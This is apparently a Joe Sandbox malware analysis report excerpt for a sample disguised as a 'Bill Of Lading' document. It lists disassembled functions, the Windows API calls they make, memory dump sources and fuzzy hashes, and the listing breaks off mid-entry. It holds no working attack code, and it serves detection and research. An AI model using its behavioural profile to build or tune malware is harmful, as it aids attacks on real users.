                                                                                                                      • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                      • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                      • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                      • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                      Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                      • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                      • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                      • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                      • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                      Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                      • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                      • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                      • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                      • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                      Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                        • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                        • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                      • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                      • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                      • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                      Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                        • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                      • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                      • __freeptd.LIBCMT ref: 0041408A
                                                                                                                      • ExitThread.KERNEL32 ref: 00414093
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3182216644-0
                                                                                                                      • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                      • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                      • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                      • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                      Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower
                                                                                                                      • String ID: $8'I
                                                                                                                      • API String ID: 2358735015-3608026889
                                                                                                                      • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                      • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                      • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                      • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                      Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                      • API String ID: 3380330463-3941886329
                                                                                                                      • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                      • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                      • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                      • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                      Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00409A61
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: 0vH
                                                                                                                      • API String ID: 1143807570-3662162768
                                                                                                                      • Opcode ID: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                                                                                                      • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                      • Opcode Fuzzy Hash: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                                                                                                      • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                      Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HH$HH
                                                                                                                      • API String ID: 0-1787419579
                                                                                                                      • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                      • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                      • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                      • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                      Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                                                                                                      • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                      • Opcode Fuzzy Hash: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                                                                                                      • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                      Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                      • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                      • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                      • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                      Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                      • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                      • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                      • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                      Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                      • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                      • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                      • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                      Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: edit
                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                      • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                      • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                      • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                      • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                      Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                      • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                      • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
